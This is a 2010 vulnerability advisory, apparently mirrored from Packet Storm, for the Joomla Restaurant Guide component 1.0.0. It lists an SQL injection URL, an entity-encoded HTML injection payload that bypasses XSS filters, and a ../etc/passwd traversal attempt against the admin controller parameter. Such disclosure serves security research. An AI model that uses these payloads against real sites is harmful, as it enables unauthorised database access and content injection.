Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormValentin HoebelPACKETSTORM:94008
HistorySep 18, 2010 - 12:00 a.m.

Joomla Restaurant Guide Cross Site Scripting / Local File Inclusion / SQL Injection

2010-09-1800:00:00
Valentin Hoebel
packetstormsecurity.com
16
JSON
`# Exploit Title: Joomla Component com_restaurantguide Multiple Vulnerabilities  
# Date: 18.09.2010  
# Author: Valentin  
# Category: webapps/0day  
# Version: 1.0.0  
  
# Tested on: Debian lenny, Apache2, MySQL 5, Joomla 1.5.x  
# CVE :   
# Code :   
  
  
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]  
>> General Information   
Advisory/Exploit Title = Joomla Component com_restaurantguide Multiple Vulnerabilities  
Author = Valentin Hoebel  
Contact = [email protected]  
  
  
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]  
>> Product information  
Name = Restaurant Guide  
Vendor = Oh-Taek Im  
Vendor Websites = http://www.photoindochina.com/, http://extensions.joomla.org/extensions/directory-a-documentation/thematic-directory/14054  
Affected Version(s) = 1.0.0  
  
  
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]  
>> SQL Injection  
index.php?option=com_restaurantguide&view=country&id='&Itemid=69  
(id parameter is vulnerable)  
  
  
>> HTML/JS/VBS Code Injection (all input fields, also in the admin backend)  
It is possible to inject HTML/JS/VBS code into the document although XSS filters are active. Simply end the current HTML tag and convert your code into decimal HTMl code without semicolons:  
">&#60&#65&#32&#72&#82&#69&#70&#61&#34&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#103&#111&#111&#103&#108&#101&#46&#99&#111&#109&#46&#47&#34&#62&#105&#110&#106&#101&#99&#116&#101&#100&#60&#47&#65&#62  
(which is "><A HREF="http://www.google.com./">injected</A>)  
The code doesn't get parsed, so it is not possible to exploit this weakness. However, including arbitrary plain text into the current website is possible. Dangerous! :D  
  
  
>> Interesting stuff  
a) Triggering various error messages in the admin panel is possible, e.g.:  
administrator/index.php?option=com_restaurantguide&controller=restaurantitems&task=edit&cid[]=[try ' or -1 or an ID which does not exist]  
Sometimes the code of the component gets displayed within the browser window when you try to trigger errors with different variables.  
  
b) Playing around with the controller variable  
administrator/index.php?option=com_restaurantguide&controller=../../../../../../../../../etc/passwd%00  
(NOT a LFI vulnerability since the controller classes are defined in the source code, you just get different error messages.. nothing to exploit here..)  
  
  
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]  
>> Additional Information  
Advisory/Exploit Published = 18.09.2010  
  
  
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]  
>> Misc  
Greetz = cr4wl3r, JosS, packetstormsecurity.org  
  
  
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]  
`
JSON